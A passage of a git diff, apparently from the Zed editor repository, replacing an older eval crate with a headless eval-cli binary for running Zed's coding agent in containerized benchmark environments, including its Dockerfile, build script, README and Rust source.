- pub fn is_empty(&self) -> bool { - self.use_counts.is_empty() && self.failure_counts.is_empty() - } -} - -impl Display for ToolMetrics { - fn fmt(&self, f: &mut std::fmt::Formatter<'_>) -> std::fmt::Result { - let mut failure_rates: Vec<(Arc, f64)> = Vec::new(); - - for (tool_name, use_count) in &self.use_counts { - let failure_count = self.failure_counts.get(tool_name).cloned().unwrap_or(0); - if *use_count > 0 { - let failure_rate = failure_count as f64 / *use_count as f64; - failure_rates.push((tool_name.clone(), failure_rate)); - } - } - - // Sort by failure rate descending - failure_rates.sort_by(|a, b| b.1.partial_cmp(&a.1).unwrap_or(std::cmp::Ordering::Equal)); - - // Table dimensions - let tool_width = 30; - let count_width = 10; - let rate_width = 10; - - // Write table top border - writeln!( - f, - "┌{}┬{}┬{}┬{}┐", - "─".repeat(tool_width), - "─".repeat(count_width), - 
"─".repeat(count_width), - "─".repeat(rate_width) - )?; - - // Write header row - writeln!( - f, - "│{:^30}│{:^10}│{:^10}│{:^10}│", - "Tool", "Uses", "Failures", "Rate" - )?; - - // Write header-data separator - writeln!( - f, - "├{}┼{}┼{}┼{}┤", - "─".repeat(tool_width), - "─".repeat(count_width), - "─".repeat(count_width), - "─".repeat(rate_width) - )?; - - // Write data rows - for (tool_name, failure_rate) in failure_rates { - let use_count = self.use_counts.get(&tool_name).cloned().unwrap_or(0); - let failure_count = self.failure_counts.get(&tool_name).cloned().unwrap_or(0); - writeln!( - f, - "│{:<30}│{:^10}│{:^10}│{:^10}│", - tool_name, - use_count, - failure_count, - format!("{}%", (failure_rate * 100.0).round()) - )?; - } - - // Write table bottom border - writeln!( - f, - "└{}┴{}┴{}┴{}┘", - "─".repeat(tool_width), - "─".repeat(count_width), - "─".repeat(count_width), - "─".repeat(rate_width) - )?; - - Ok(()) - } -} diff --git a/crates/eval_cli/.gitignore b/crates/eval_cli/.gitignore new file mode 100644 index 0000000000000000000000000000000000000000..083ef6e3d354cb335e59916071199149d11965be --- /dev/null +++ b/crates/eval_cli/.gitignore @@ -0,0 +1,3 @@ +**/jobs +**/*.egg-info +**/__pycache__ diff --git a/crates/eval/Cargo.toml b/crates/eval_cli/Cargo.toml similarity index 63% rename from crates/eval/Cargo.toml rename to crates/eval_cli/Cargo.toml index a8917181a1253dea614a02bfaa799ace0ee6ba64..cac5dc6aa28fa9dfa9b7d41caf0db125daf596dc 100644 --- a/crates/eval/Cargo.toml +++ b/crates/eval_cli/Cargo.toml @@ -1,70 +1,51 @@ [package] -name = "eval" +name = "eval_cli" version = "0.1.0" publish.workspace = true edition.workspace = true license = "GPL-3.0-or-later" -default-run = "eval" [lints] workspace = true [[bin]] -name = "eval" -path = "src/eval.rs" - -[[bin]] -name = "explorer" -path = "src/explorer.rs" +name = "eval-cli" +path = "src/main.rs" [dependencies] acp_thread.workspace = true -agent = { workspace = true, features = ["eval"] } +agent.workspace = 
true agent-client-protocol.workspace = true -agent_settings.workspace = true agent_ui.workspace = true anyhow.workspace = true -async-trait.workspace = true -buffer_diff.workspace = true -chrono.workspace = true clap.workspace = true client.workspace = true -collections.workspace = true +ctrlc = { version = "3.5", features = ["termination"] } +db.workspace = true debug_adapter_extension.workspace = true -dirs.workspace = true -dotenvy.workspace = true env_logger.workspace = true extension.workspace = true +feature_flags.workspace = true fs.workspace = true futures.workspace = true gpui.workspace = true gpui_platform.workspace = true gpui_tokio.workspace = true -handlebars.workspace = true language.workspace = true language_extension.workspace = true language_model.workspace = true language_models.workspace = true languages = { workspace = true, features = ["load-grammars"] } -markdown.workspace = true node_runtime.workspace = true -pathdiff.workspace = true paths.workspace = true -pretty_assertions.workspace = true project.workspace = true prompt_store.workspace = true -regex.workspace = true -rand.workspace = true release_channel.workspace = true reqwest_client.workspace = true serde.workspace = true serde_json.workspace = true settings.workspace = true shellexpand.workspace = true -telemetry.workspace = true terminal_view.workspace = true -toml.workspace = true -unindent.workspace = true util.workspace = true -uuid.workspace = true watch.workspace = true diff --git a/crates/eval_cli/Dockerfile b/crates/eval_cli/Dockerfile new file mode 100644 index 0000000000000000000000000000000000000000..06593a124fe61c50f36c1c3e88f2a0b7443604d3 --- /dev/null +++ b/crates/eval_cli/Dockerfile @@ -0,0 +1,50 @@ +# Build eval-cli for Linux. +# +# Usage (from the zed repo root): +# docker build --platform linux/amd64 -f crates/eval_cli/Dockerfile -t eval-cli-builder . 
+# docker cp "$(docker create eval-cli-builder)":/eval-cli ./target/eval-cli +# +# Or use the helper script: +# crates/eval_cli/script/build-linux + +FROM rust:1.94.1 AS builder + +WORKDIR /app + + # Pre-install the toolchain specified in rust-toolchain.toml so it is cached. +RUN rustup toolchain install 1.94.1 --profile minimal \ + --component rustfmt --component clippy --component rust-analyzer --component rust-src \ + --target wasm32-wasip2 --target wasm32-unknown-unknown --target x86_64-unknown-linux-musl --target x86_64-unknown-linux-gnu + +# Install build tools. cmake + build-essential are needed for vendored C +# libraries (libgit2-sys, zstd-sys, libsqlite3-sys). No audio/GUI -dev +# packages required — eval-cli runs headless with those features disabled. +# +# cargo-zigbuild cross-compiles against musl libc, producing a fully +# static binary that runs on any Linux distro (glibc or musl / Alpine). +RUN apt-get update && apt-get install -y --no-install-recommends \ + cmake \ + build-essential \ + curl \ + xz-utils \ + && rm -rf /var/lib/apt/lists/* + +RUN mkdir -p /opt/zig \ + && curl -fsSL https://ziglang.org/download/0.15.2/zig-x86_64-linux-0.15.2.tar.xz \ + | tar -xJ -C /opt/zig --strip-components=1 \ + && ln -s /opt/zig/zig /usr/local/bin/zig + +RUN cargo install --locked cargo-zigbuild + +COPY . . 
+ +RUN --mount=type=cache,target=/usr/local/cargo/registry \ + --mount=type=cache,target=/usr/local/cargo/git \ + --mount=type=cache,target=/app/target \ + cargo zigbuild --release --package eval_cli \ + --target x86_64-unknown-linux-musl && \ + cp /app/target/x86_64-unknown-linux-musl/release/eval-cli /eval-cli && \ + strip /eval-cli + +FROM scratch +COPY --from=builder /eval-cli /eval-cli diff --git a/crates/eval_cli/Dockerfile.dockerignore b/crates/eval_cli/Dockerfile.dockerignore new file mode 100644 index 0000000000000000000000000000000000000000..419f92f9c9b6dad52f04c9ad39e031a7405f2a4b --- /dev/null +++ b/crates/eval_cli/Dockerfile.dockerignore @@ -0,0 +1,21 @@ +.git +.github +**/.gitignore +**/.gitkeep +.gitattributes +.mailmap +**/target +zed.xcworkspace +.DS_Store +compose.yml +plugins/bin +script/node_modules +styles/node_modules +crates/collab/static/styles.css +vendor/bin +assets/themes/ +**/jobs + +**/*.egg-info +**/__pycache__ +**/.venv diff --git a/crates/assistant_text_thread/LICENSE-GPL b/crates/eval_cli/LICENSE-GPL similarity index 100% rename from crates/assistant_text_thread/LICENSE-GPL rename to crates/eval_cli/LICENSE-GPL diff --git a/crates/eval_cli/README.md b/crates/eval_cli/README.md new file mode 100644 index 0000000000000000000000000000000000000000..a9952bbf4fe1066a78acaad15bfab10d0cee098d --- /dev/null +++ b/crates/eval_cli/README.md @@ -0,0 +1,108 @@ +# eval-cli + +Headless CLI binary for running Zed's agent in evaluation/benchmark +environments. Designed to work inside containerized environments like +[Harbor](https://harborframework.com/) where the repository is already +checked out and API keys are provided via environment variables. + +Uses the same `NativeAgent` + `AcpThread` pipeline as the production Zed +editor — full agentic loop with tool calls, subagents, and retries, just +without a GUI. 
+ +## Building + +### Native (for local testing on the same OS) + +``` +cargo build --release -p eval_cli +``` + +### Cross-compile for Linux x86_64 (from macOS or other hosts) + +Harbor containers run Linux x86_64. Use the Docker-based build script: + +``` +crates/eval_cli/script/build-linux +``` + +This produces `target/eval-cli` (an x86_64 Linux ELF binary). You can +also specify a custom output path: + +``` +crates/eval_cli/script/build-linux --output ~/bin/eval-cli-linux +``` + +## Standalone usage + +``` +eval-cli \ + --workdir /testbed \ + --model anthropic/claude-sonnet-4-6-latest \ + --instruction "Fix the bug described in..." \ + --timeout 600 \ + --output-dir /logs/agent +``` + +Reads API keys from environment variables (`ANTHROPIC_API_KEY`, +`OPENAI_API_KEY`, etc.). Writes `result.json`, `thread.md`, and +`thread.json` to the output directory. + +### Exit codes + +| Code | Meaning | +| ---- | ---------------------------------- | +| 0 | Agent finished | +| 1 | Error (model/auth/runtime failure) | +| 2 | Timeout | +| 3 | Interrupted (SIGTERM/SIGINT) | + +## Harbor integration + +The `zed_eval/` directory contains a Python package that +implements Harbor's `BaseInstalledAgent` interface, allowing eval-cli to +be used with `--agent-import-path` without modifying Harbor's source code. + +### Setup + +``` +pip install -e crates/eval_cli/harbor/ +``` + +### Running with a local binary + +Build for Linux first, then pass the binary path: + +``` +crates/eval_cli/script/build-linux + +harbor run -d "swebench_verified@latest" \ + --agent-import-path zed_eval.agent:ZedAgent \ + --ak binary_path=target/eval-cli \ + -m anthropic/claude-sonnet-4-6-latest +``` + +The agent uploads the binary into the container during setup — no +download URL needed during local iteration.
+ +### Running with a download URL + +For CI or when the binary is hosted somewhere: + +``` +harbor run -d "swebench_verified@latest" \ + --agent-import-path zed_eval.agent:ZedAgent \ + --ak download_url=https://example.com/eval-cli \ + -m anthropic/claude-sonnet-4-6-latest +``` + +### Setting a timeout + +Pass `EVAL_CLI_TIMEOUT` via `--ae`: + +``` +harbor run -d "swebench_verified@latest" \ + --agent-import-path zed_eval.agent:ZedAgent \ + --ak binary_path=target/eval-cli \ + --ae EVAL_CLI_TIMEOUT=600 \ + -m anthropic/claude-sonnet-4-6-latest +``` diff --git a/crates/eval/build.rs b/crates/eval_cli/build.rs similarity index 89% rename from crates/eval/build.rs rename to crates/eval_cli/build.rs index 9ab40da0fb0ca880cecc3a87d5a9e95172dcb6ec..0180e9036fbd049ba5a9e5b455ec1c017cd700e3 100644 --- a/crates/eval/build.rs +++ b/crates/eval_cli/build.rs @@ -10,5 +10,6 @@ fn main() { .expect("Invalid version format") .trim() .trim_matches('"'); + println!("cargo:rerun-if-changed=../zed/Cargo.toml"); println!("cargo:rustc-env=ZED_PKG_VERSION={}", version); } diff --git a/crates/eval_cli/script/build-linux b/crates/eval_cli/script/build-linux new file mode 100755 index 0000000000000000000000000000000000000000..dbb1d32668e9e3347a98de423521985059cbbbff --- /dev/null +++ b/crates/eval_cli/script/build-linux @@ -0,0 +1,59 @@ +#!/usr/bin/env bash +# +# Build eval-cli for x86_64 Linux from any host (macOS, Linux, etc.) +# using Docker + cargo-zigbuild. Targets musl libc, producing a fully +# static binary that runs on any Linux distro (glibc or musl / Alpine). +# The resulting binary is placed at the path printed on completion +# (default: target/eval-cli). +# +# Usage: +# crates/eval_cli/script/build-linux [--output PATH] +# +# Examples: +# crates/eval_cli/script/build-linux +# crates/eval_cli/script/build-linux --output ~/bin/eval-cli +# +# Prerequisites: Docker must be installed and running. 
+ +set -euo pipefail + +SCRIPT_DIR="$(cd "$(dirname "$0")" && pwd)" +REPO_ROOT="$(cd "$SCRIPT_DIR/../../.." && pwd)" +OUTPUT="${REPO_ROOT}/target/eval-cli" + +while [[ $# -gt 0 ]]; do + case $1 in + --output) + OUTPUT="$2" + shift 2 + ;; + *) + echo "Unknown option: $1" >&2 + exit 1 + ;; + esac +done + +cd "$REPO_ROOT" + +IMAGE_TAG="eval-cli-builder" + +echo "Building eval-cli for x86_64-unknown-linux-musl (static binary)..." +echo " Repo root: $REPO_ROOT" +echo " Output: $OUTPUT" +echo "" + +docker build \ + --platform linux/amd64 \ + -f crates/eval_cli/Dockerfile \ + -t "$IMAGE_TAG" \ + . + +CONTAINER_ID=$(docker create "$IMAGE_TAG" /eval-cli) +mkdir -p "$(dirname "$OUTPUT")" +docker cp "$CONTAINER_ID":/eval-cli "$OUTPUT" +docker rm "$CONTAINER_ID" > /dev/null + +echo "" +echo "Built successfully: $OUTPUT" +echo " $(file "$OUTPUT")" diff --git a/crates/eval_cli/src/headless.rs b/crates/eval_cli/src/headless.rs new file mode 100644 index 0000000000000000000000000000000000000000..0ddd99e8f8abd9dbd73e1d7461526f3e7cb24f11 --- /dev/null +++ b/crates/eval_cli/src/headless.rs @@ -0,0 +1,136 @@ +use std::path::PathBuf; +use std::sync::Arc; + +use client::{Client, ProxySettings, RefreshLlmTokenListener, UserStore}; +use db::AppDatabase; +use extension::ExtensionHostProxy; +use fs::RealFs; +use gpui::http_client::read_proxy_from_env; +use gpui::{App, AppContext as _, Entity}; +use gpui_tokio::Tokio; +use language::LanguageRegistry; +use language_extension::LspAccess; +use node_runtime::{NodeBinaryOptions, NodeRuntime}; +use project::project_settings::ProjectSettings; +use prompt_store::PromptBuilder; +use release_channel::{AppCommitSha, AppVersion}; +use reqwest_client::ReqwestClient; +use settings::{Settings, SettingsStore}; +use util::ResultExt as _; + +pub struct AgentCliAppState { + pub languages: Arc, + pub client: Arc, + pub user_store: Entity, + pub fs: Arc, + pub node_runtime: NodeRuntime, +} + +pub fn init(cx: &mut App) -> Arc { + let app_commit_sha = 
option_env!("ZED_COMMIT_SHA").map(|s| AppCommitSha::new(s.to_owned())); + + let app_version = AppVersion::load( + env!("ZED_PKG_VERSION"), + option_env!("ZED_BUILD_ID"), + app_commit_sha, + ); + + release_channel::init(app_version.clone(), cx); + gpui_tokio::init(cx); + + let settings_store = SettingsStore::new(cx, &settings::default_settings()); + cx.set_global(settings_store); + + let user_agent = format!( + "Zed Agent CLI/{} ({}; {})", + app_version, + std::env::consts::OS, + std::env::consts::ARCH + ); + let proxy_str = ProxySettings::get_global(cx).proxy.to_owned(); + let proxy_url = proxy_str + .as_ref() + .and_then(|input| input.parse().ok()) + .or_else(read_proxy_from_env); + let http = { + let _guard = Tokio::handle(cx).enter(); + ReqwestClient::proxy_and_user_agent(proxy_url, &user_agent) + .expect("could not start HTTP client") + }; + cx.set_http_client(Arc::new(http)); + + let client = Client::production(cx); + cx.set_http_client(client.http_client()); + + let app_db = AppDatabase::new(); + cx.set_global(app_db); + + let git_binary_path = None; + let fs = Arc::new(RealFs::new( + git_binary_path, + cx.background_executor().clone(), + )); + + let mut languages = LanguageRegistry::new(cx.background_executor().clone()); + languages.set_language_server_download_dir(paths::languages_dir().clone()); + let languages = Arc::new(languages); + + let user_store = cx.new(|cx| UserStore::new(client.clone(), cx)); + + extension::init(cx); + + let (mut node_options_tx, node_options_rx) = watch::channel(None); + cx.observe_global::(move |cx| { + let settings = &ProjectSettings::get_global(cx).node; + let options = NodeBinaryOptions { + allow_path_lookup: !settings.ignore_system_version, + allow_binary_download: true, + use_paths: settings.path.as_ref().map(|node_path| { + let node_path = PathBuf::from(shellexpand::tilde(node_path).as_ref()); + let npm_path = settings + .npm_path + .as_ref() + .map(|path| PathBuf::from(shellexpand::tilde(&path).as_ref())); + ( + 
node_path.clone(), + npm_path.unwrap_or_else(|| { + let base_path = PathBuf::new(); + node_path.parent().unwrap_or(&base_path).join("npm") + }), + ) + }), + }; + node_options_tx.send(Some(options)).log_err(); + }) + .detach(); + let node_runtime = NodeRuntime::new(client.http_client(), None, node_options_rx); + + let extension_host_proxy = ExtensionHostProxy::global(cx); + debug_adapter_extension::init(extension_host_proxy.clone(), cx); + language_extension::init(LspAccess::Noop, extension_host_proxy, languages.clone()); + language_model::init(cx); + RefreshLlmTokenListener::register(client.clone(), user_store.clone(), cx); + language_models::init(user_store.clone(), client.clone(), cx); + languages::init(languages.clone(), fs.clone(), node_runtime.clone(), cx); + prompt_store::init(cx); + terminal_view::init(cx); + + let stdout_is_a_pty = false; + let prompt_builder = PromptBuilder::load(fs.clone(), stdout_is_a_pty, cx); + agent_ui::init( + fs.clone(), + prompt_builder, + languages.clone(), + true, + true, + cx, + ); + + Arc::new(AgentCliAppState { + languages, + client, + user_store, + fs, + node_runtime, + }) +} diff --git a/crates/eval_cli/src/main.rs b/crates/eval_cli/src/main.rs new file mode 100644 index 0000000000000000000000000000000000000000..f9ab1835f94327c72462ba7014bf7517d12ac55d --- /dev/null +++ b/crates/eval_cli/src/main.rs @@ -0,0 +1,574 @@ +//! Headless CLI binary for running Zed's agent in evaluation/benchmark environments. +//! +//! Designed to work inside containerized environments (like Harbor/termbench) where: +//! - The repository is already checked out at the working directory +//! - The model API key is provided via environment variables +//! - Results are written to an output directory (default: `/logs/agent/`) +//! +//! ## Usage +//! +//! ```text +//! eval-cli --workdir /testbed --model anthropic/claude-sonnet-4-6-latest \ +//! --instruction "Fix the bug described in..." --timeout 600 +//! ``` +//! +//! ## Output +//! +//! 
Writes to `--output-dir` (default `/logs/agent/`): +//! - `result.json` — structured result with status, timing, and token usage +//! - `thread.md` — full conversation as markdown +//! - `thread.json` — raw thread state as JSON +//! +//! ## Exit codes +//! +//! | Code | Meaning | +//! |------|---------| +//! | 0 | Agent finished | +//! | 1 | Error (model/auth/runtime failure) | +//! | 2 | Timeout | +//! | 3 | Interrupted (SIGTERM/SIGINT) | + +mod headless; + +use std::path::PathBuf; +use std::process; +use std::rc::Rc; +use std::str::FromStr; +use std::sync::Arc; +use std::sync::atomic::{AtomicBool, Ordering}; +use std::time::{Duration, Instant}; + +use acp_thread::AgentConnection as _; +use agent::{NativeAgent, NativeAgentConnection, Templates, ThreadStore}; +use agent_client_protocol as acp; +use anyhow::{Context, Result}; +use clap::Parser; +use feature_flags::FeatureFlagAppExt as _; + +use futures::{FutureExt, select_biased}; +use gpui::{AppContext as _, AsyncApp, Entity, UpdateGlobal}; +use language_model::{LanguageModelRegistry, SelectedModel}; +use project::Project; +use settings::SettingsStore; +use util::path_list::PathList; + +use crate::headless::AgentCliAppState; + +#[derive(Parser, Debug)] +#[command( + name = "eval-cli", + about = "Run Zed's agent headlessly in evaluation/benchmark environments" +)] +struct Args { + /// Output current environment variables as JSON to stdout. + /// Used internally by Zed's shell environment capture. + #[arg(long, hide = true)] + printenv: bool, + + /// Path to the repository working directory. Defaults to the current directory. + #[arg(long, default_value = ".")] + workdir: PathBuf, + + /// Instruction/prompt text. If omitted, read from --instruction-file or stdin. + #[arg(long)] + instruction: Option, + + /// Language model to use, in `provider/model` format. + #[arg(long, default_value = "anthropic/claude-sonnet-4-6-latest")] + model: String, + + /// Maximum wall-clock time in seconds for the agent run. 
+ #[arg(long)] + timeout: Option, + + /// Directory for output artifacts (result.json, thread.md, thread.json). + #[arg(long, default_value = ".")] + output_dir: PathBuf, + + /// Disable staff mode (staff mode is enabled by default). + #[arg(long)] + no_staff: bool, + + /// Reasoning effort level for models that support thinking (low, medium, high). + /// Defaults to "high" for thinking-capable models. + #[arg(long)] + reasoning_effort: Option, + + /// Enable or disable extended thinking. Defaults to model auto-detection if omitted. + #[arg(long)] + thinking: Option, +} + +enum AgentOutcome { + Completed, + Timeout { seconds: u64 }, + Interrupted, +} + +#[derive(serde::Serialize)] +struct EvalResult { + status: String, + #[serde(skip_serializing_if = "Option::is_none")] + error: Option, + duration_secs: f64, + #[serde(skip_serializing_if = "Option::is_none")] + timeout_secs: Option, + model: String, + #[serde(skip_serializing_if = "Option::is_none")] + input_tokens: Option, + #[serde(skip_serializing_if = "Option::is_none")] + output_tokens: Option, + #[serde(skip_serializing_if = "Option::is_none")] + cache_creation_input_tokens: Option, + #[serde(skip_serializing_if = "Option::is_none")] + cache_read_input_tokens: Option, +} + +const EXIT_OK: i32 = 0; +const EXIT_ERROR: i32 = 1; +const EXIT_TIMEOUT: i32 = 2; +const EXIT_INTERRUPTED: i32 = 3; + +static TERMINATED: AtomicBool = AtomicBool::new(false); + +fn main() { + let args = Args::parse(); + + if args.printenv { + util::shell_env::print_env(); + return; + } + + env_logger::init(); + + ctrlc::set_handler(|| { + TERMINATED.store(true, Ordering::SeqCst); + }) + .expect("failed to set signal handler"); + + let instruction = read_instruction(&args).unwrap_or_else(|e| { + eprintln!("Error reading instruction: {e}"); + process::exit(EXIT_ERROR); + }); + + let workdir = args.workdir.canonicalize().unwrap_or_else(|e| { + eprintln!("Invalid --workdir {:?}: {e}", args.workdir); + process::exit(EXIT_ERROR); + }); + + let 
output_dir = args.output_dir.clone(); + if let Err(e) = std::fs::create_dir_all(&output_dir) { + eprintln!("Error creating output dir {}: {e}", output_dir.display()); + process::exit(EXIT_ERROR); + } + + let http_client = Arc::new(reqwest_client::ReqwestClient::new()); + let app = gpui_platform::headless().with_http_client(http_client); + + app.run(move |cx| { + let app_state = headless::init(cx); + cx.set_staff(!args.no_staff); + + let auth_tasks = LanguageModelRegistry::global(cx).update(cx, |registry, cx| { + registry + .providers() + .iter() + .map(|p| p.authenticate(cx)) + .collect::>() + }); + + let model_name = args.model.clone(); + let timeout = args.timeout; + let thinking_override = args.thinking; + let reasoning_effort = args.reasoning_effort.clone(); + + cx.spawn(async move |cx| { + futures::future::join_all(auth_tasks).await; + + let start = Instant::now(); + + let (outcome, token_usage) = run_agent( + &app_state, + &workdir, + &instruction, + &model_name, + timeout, + thinking_override, + reasoning_effort.as_deref(), + Some(&output_dir), + cx, + ) + .await; + + let duration = start.elapsed(); + + let (status, error, exit_code) = match &outcome { + Ok(AgentOutcome::Completed) => ("completed".to_string(), None, EXIT_OK), + Ok(AgentOutcome::Timeout { seconds }) => { + eprintln!("Timeout: agent exceeded {seconds}s time limit"); + ("timeout".to_string(), None, EXIT_TIMEOUT) + } + Ok(AgentOutcome::Interrupted) => { + eprintln!("Interrupted: received SIGTERM, saved partial output"); + ("interrupted".to_string(), None, EXIT_INTERRUPTED) + } + Err(e) => { + eprintln!("Error: {e:#}"); + ("error".to_string(), Some(format!("{e:#}")), EXIT_ERROR) + } + }; + + let result = EvalResult { + status, + error, + duration_secs: duration.as_secs_f64(), + timeout_secs: timeout, + model: model_name.clone(), + input_tokens: token_usage.as_ref().map(|u| u.input_tokens), + output_tokens: token_usage.as_ref().map(|u| u.output_tokens), + cache_creation_input_tokens: token_usage + 
.as_ref() + .filter(|u| u.cache_creation_input_tokens > 0) + .map(|u| u.cache_creation_input_tokens), + cache_read_input_tokens: token_usage + .as_ref() + .filter(|u| u.cache_read_input_tokens > 0) + .map(|u| u.cache_read_input_tokens), + }; + + match serde_json::to_string_pretty(&result) { + Ok(json) => { + if let Err(e) = std::fs::write(output_dir.join("result.json"), &json) { + eprintln!("Error writing result.json: {e:#}"); + } + eprintln!("[eval-cli] result: {json}"); + } + Err(e) => eprintln!("Error serializing result: {e:#}"), + } + + cx.update(|cx| cx.quit()); + process::exit(exit_code); + }) + .detach(); + }); +} + +fn read_instruction(args: &Args) -> Result { + let text = if let Some(text) = &args.instruction { + text.clone() + } else { + use std::io::Read; + let mut buf = String::new(); + std::io::stdin() + .read_to_string(&mut buf) + .context("reading instruction from stdin")?; + buf + }; + anyhow::ensure!(!text.trim().is_empty(), "instruction is empty"); + Ok(text) +} + +async fn run_agent( + app_state: &Arc, + workdir: &std::path::Path, + instruction: &str, + model_name: &str, + timeout: Option, + thinking_override: Option, + reasoning_effort: Option<&str>, + output_dir: Option<&std::path::Path>, + cx: &mut AsyncApp, +) -> (Result, Option) { + let setup_result: Result<()> = cx.update(|cx| { + let selected = SelectedModel::from_str(model_name).map_err(|e| anyhow::anyhow!("{e}"))?; + let registry = LanguageModelRegistry::global(cx); + let model = registry + .read(cx) + .available_models(cx) + .find(|m| m.id() == selected.model && m.provider_id() == selected.provider) + .ok_or_else(|| { + let available = registry + .read(cx) + .available_models(cx) + .map(|m| format!("{}/{}", m.provider_id().0, m.id().0)) + .collect::>() + .join(", "); + anyhow::anyhow!("Model {model_name} not found. 
Available: {available}") + })?; + + let supports_thinking = model.supports_thinking(); + + registry.update(cx, |registry, cx| { + registry.set_default_model( + Some(language_model::ConfiguredModel { + provider: registry + .provider(&model.provider_id()) + .context("Provider not found")?, + model, + }), + cx, + ); + anyhow::Ok(()) + })?; + + let enable_thinking = thinking_override.unwrap_or(supports_thinking); + let effort = if enable_thinking { + match reasoning_effort { + Some(level) => format!("\"{level}\""), + None => "\"high\"".to_string(), + } + } else { + "null".to_string() + }; + let provider_id = selected.provider.0.to_string(); + let model_id = selected.model.0.to_string(); + SettingsStore::update_global(cx, |store, cx| { + let settings = format!( + r#"{{ + "agent": {{ + "tool_permissions": {{"default": "allow"}}, + "default_model": {{ + "provider": "{provider_id}", + "model": "{model_id}", + "enable_thinking": {enable_thinking}, + "effort": {effort} + }} + }}, + "autosave": "off", + "format_on_save": "off" + }}" + "# + ); + store.set_user_settings(&settings, cx).ok(); + }); + + anyhow::Ok(()) + }); + + if let Err(e) = setup_result { + return (Err(e), None); + } + + let project = cx.update(|cx| { + Project::local( + app_state.client.clone(), + app_state.node_runtime.clone(), + app_state.user_store.clone(), + app_state.languages.clone(), + app_state.fs.clone(), + None, + project::LocalProjectFlags { + init_worktree_trust: false, + ..Default::default() + }, + cx, + ) + }); + + let worktree = project.update(cx, |project, cx| project.create_worktree(workdir, true, cx)); + let worktree = match worktree.await { + Ok(w) => w, + Err(e) => return (Err(e).context("creating worktree"), None), + }; + + let scan_result = worktree.update(cx, |tree, _cx| { + tree.as_local() + .context("expected local worktree") + .map(|local| local.scan_complete()) + }); + match scan_result { + Ok(future) => future.await, + Err(e) => return (Err(e), None), + }; + + let agent = 
cx.update(|cx| { + let thread_store = cx.new(|cx| ThreadStore::new(cx)); + NativeAgent::new( + thread_store, + Templates::new(), + None, + app_state.fs.clone(), + cx, + ) + }); + + let connection = Rc::new(NativeAgentConnection(agent.clone())); + let acp_thread = match cx + .update(|cx| { + connection + .clone() + .new_session(project, PathList::new(&[workdir]), cx) + }) + .await + { + Ok(t) => t, + Err(e) => return (Err(e).context("creating ACP session"), None), + }; + + let _subscription = cx.subscribe(&acp_thread, |acp_thread, event, cx| { + log_acp_thread_event(&acp_thread, event, cx); + }); + + let message = vec![acp::ContentBlock::Text(acp::TextContent::new( + instruction.to_string(), + ))]; + + let send_future = acp_thread.update(cx, |acp_thread: &mut acp_thread::AcpThread, cx| { + acp_thread.send(message, cx) + }); + + let timeout_future = if let Some(timeout_secs) = timeout { + futures::future::Either::Left( + cx.background_executor() + .timer(Duration::from_secs(timeout_secs)), + ) + } else { + futures::future::Either::Right(futures::future::pending::<()>()) + }; + + let sigterm_future = { + let executor = cx.background_executor().clone(); + async move { + while !TERMINATED.load(Ordering::Relaxed) { + executor.timer(Duration::from_millis(100)).await; + } + } + }; + + let outcome = select_biased! 
{ + result = send_future.fuse() => match result { + Ok(Some(response)) => { + eprintln!("[eval-cli] stopped: {:?}", response.stop_reason); + if response.stop_reason == acp::StopReason::MaxTokens { + Err(anyhow::anyhow!("Model hit maximum token limit")) + } else { + Ok(AgentOutcome::Completed) + } + } + Ok(None) => { + eprintln!("[eval-cli] completed (no response)"); + Ok(AgentOutcome::Completed) + } + Err(e) => Err(e).context("agent run failed"), + }, + _ = sigterm_future.fuse() => { + eprintln!("[eval-cli] received SIGTERM, cancelling..."); + acp_thread.update(cx, |t: &mut acp_thread::AcpThread, cx| t.cancel(cx)).await; + Ok(AgentOutcome::Interrupted) + }, + _ = timeout_future.fuse() => { + acp_thread.update(cx, |t: &mut acp_thread::AcpThread, cx| t.cancel(cx)).await; + Ok(AgentOutcome::Timeout { seconds: timeout.unwrap_or(0) }) + } + }; + + let thread = cx.update(|cx| { + let session_id = acp_thread.read(cx).session_id().clone(); + connection.thread(&session_id, cx) + }); + + let cumulative_usage = if let Some(thread) = &thread { + let db_thread = thread.read_with(cx, |thread, cx| thread.to_db(cx)); + let db_thread = db_thread.await; + let usage = db_thread.cumulative_token_usage; + if usage.input_tokens > 0 || usage.output_tokens > 0 { + Some(usage) + } else { + None + } + } else { + None + }; + + let acp_usage = cx.update(|cx| { + acp_thread + .read(cx) + .token_usage() + .map(|usage| language_model::TokenUsage { + input_tokens: usage.input_tokens, + output_tokens: usage.output_tokens, + ..Default::default() + }) + }); + + let final_usage = cumulative_usage.or(acp_usage); + + if let (Some(thread), Some(dir)) = (&thread, output_dir) { + let markdown = thread.read_with(cx, |thread, _cx| thread.to_markdown()); + if let Err(e) = std::fs::write(dir.join("thread.md"), markdown) { + eprintln!("Error writing thread.md: {e:#}"); + } + + let db_thread = thread.read_with(cx, |thread, cx| thread.to_db(cx)); + let db_thread = db_thread.await; + match 
serde_json::to_string_pretty(&db_thread) { + Ok(json) => { + if let Err(e) = std::fs::write(dir.join("thread.json"), json) { + eprintln!("Error writing thread.json: {e:#}"); + } + } + Err(e) => eprintln!("Error serializing thread.json: {e:#}"), + } + } + + (outcome, final_usage) +} + +fn log_acp_thread_event( + acp_thread: &Entity, + event: &acp_thread::AcpThreadEvent, + cx: &mut gpui::App, +) { + match event { + acp_thread::AcpThreadEvent::NewEntry => { + let entries = acp_thread.read(cx).entries(); + if let Some(acp_thread::AgentThreadEntry::AssistantMessage(message)) = entries.last() { + for chunk in &message.chunks { + if let acp_thread::AssistantMessageChunk::Message { block } = chunk { + if let acp_thread::ContentBlock::Markdown { markdown } = block { + let text = markdown.read(cx).source().to_string(); + if !text.is_empty() { + eprint!("{text}"); + } + } + } + } + } + } + acp_thread::AcpThreadEvent::EntryUpdated(index) => { + let entries = acp_thread.read(cx).entries(); + if let Some(acp_thread::AgentThreadEntry::ToolCall(tool_call)) = entries.get(*index) { + if let Some(name) = &tool_call.tool_name { + match &tool_call.status { + acp_thread::ToolCallStatus::Completed => { + eprintln!("[tool] {name} ✓"); + } + acp_thread::ToolCallStatus::Failed => { + eprintln!("[tool] {name} ✗"); + } + acp_thread::ToolCallStatus::Rejected => { + eprintln!("[tool] {name} rejected"); + } + acp_thread::ToolCallStatus::Canceled => { + eprintln!("[tool] {name} canceled"); + } + _ => {} + } + } + } + } + acp_thread::AcpThreadEvent::Stopped(reason) => { + eprintln!("\n[eval-cli] stopped: {reason:?}"); + } + acp_thread::AcpThreadEvent::Error => { + eprintln!("[eval-cli] error event"); + } + acp_thread::AcpThreadEvent::Retry(status) => { + eprintln!("[eval-cli] retry: {status:?}"); + } + acp_thread::AcpThreadEvent::SubagentSpawned(session_id) => { + 